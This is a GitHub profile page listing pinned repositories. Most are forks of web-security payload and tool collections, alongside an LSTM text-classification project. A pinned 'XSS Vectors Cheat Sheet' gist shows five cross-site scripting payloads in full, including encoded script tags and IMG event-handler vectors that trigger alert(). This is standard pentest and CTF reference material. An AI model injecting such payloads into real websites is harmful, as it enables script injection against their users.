Skip to content
View jihwanjeon's full-sized avatar

Block or report jihwanjeon

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. Document-Classification-with-LSTM-Model Document-Classification-with-LSTM-Model Public

    Python

  2. PayloadsAllTheThings PayloadsAllTheThings Public

    Forked from swisskyrepo/PayloadsAllTheThings

    A list of useful payloads and bypass for Web Application Security and Pentest/CTF

    Python

  3. XSS Vectors Cheat Sheet XSS Vectors Cheat Sheet
    1
    %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
    2
    <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
    3
    <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
    4
    <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
    5
    <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
  4. AwesomeXSS AwesomeXSS Public

    Forked from s0md3v/AwesomeXSS

    Awesome XSS stuff

    JavaScript

  5. WebHackersWeapons WebHackersWeapons Public

    Forked from hahwul/WebHackersWeapons

    ⚔️ Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting

    Go